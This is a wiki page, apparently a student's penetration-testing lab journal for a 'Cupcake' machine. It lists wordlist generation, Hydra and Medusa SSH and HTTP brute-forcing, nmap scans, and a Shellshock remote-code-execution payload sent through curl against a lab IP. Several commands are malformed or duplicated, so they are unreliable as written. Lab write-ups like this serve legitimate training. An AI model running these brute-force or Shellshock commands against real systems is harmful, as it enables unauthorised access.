Cupcake - DefiantCoder/Tech-Journals GitHub Wiki

• CEWL Create Custom Wordlist

cewl -w filename.txt -d 0 -

• RSMANGLER

cat user.txt | rsmangler -y -t -m 9 -x 12 -d -f -> user_pass.txt

• Medusa

medusa -h IP ADDRESS -u uname -P user_pass.txt -M http

• Hydra

hydra - user.name-P user_pass.txt -f IP ADDRESS ssh

• How you determined the versions of the two services exposed by cupcake

sudo nmap -A -sV -O -p 1-6000 10.0.5.23 using this command i could search the first 6k ports

• How you dealt with parsing nmap result with nmaptocsv

sudo nmap -sT -sV -p 1-1000 10.0.5.23 -Pn -oG top1000.txt this command outputs a file of the first 1000 ports

• The techniques you used to invoke remote code execution

Nmap :

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -s -r -v" 10.0.5.23 This command returns the current kernel version

Curl :

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -s -r -v" 10.0.5.23

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat status' bash -s :'' http://10.0.5.23/cgi-bin/status

These commands will remotely execute the code

• The generation of a list of passwords and subsequent ssh bruteforce

using a password list hydra -l samwise -P passwordlist.txt 10.0.5.23 -t 4 ssh can be used to determine the password for samwise

• Transfer of files using python and wget or any other mechanism you chose

• Compiling and running a privilege escalation exploit (It can be different than the dem